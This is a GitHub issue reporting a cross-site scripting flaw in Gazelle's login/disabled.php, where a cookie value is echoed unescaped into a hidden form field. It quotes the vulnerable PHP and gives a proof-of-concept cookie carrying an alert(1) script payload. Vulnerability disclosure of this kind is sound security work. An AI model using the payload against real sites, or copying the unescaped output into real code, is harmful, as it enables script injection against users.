xss_1


Hello,

I would like to report for a XSS vulnerability  in gazelle commit 63b3370

In file https://github.com/WhatCD/Gazelle/blob/master/sections/login/disabled.php

```php
...
<form action="" method="POST">
	<input type="email" class="inputtext" placeholder="Email Address" name="email" required /> <input type="submit" value="Submit" />
	<input type="hidden" name="username" value="<?=$_COOKIE['username']?>" />		// Line 25
</form><br /><br />
...
```

Source from `$_COOKIE['username']` without any filtering or checking which resulting in XSS.

# Poc

`GET sections/login/disabled.php`

With the Cookie

`username=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22`

# Manual verification

![1_0](https://github.com/user-attachments/assets/df0116aa-d0cc-46fd-93e7-4005f07c4dc4)

![1](https://github.com/user-attachments/assets/00c0fde6-01c9-4dbf-81b2-3efea02d2c1f)


BTW，cms.gazelle.com in local（changes hosts）


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

xss_1 #129

Poc

Manual verification

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

xss_1 #129

Description

Poc

Manual verification

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions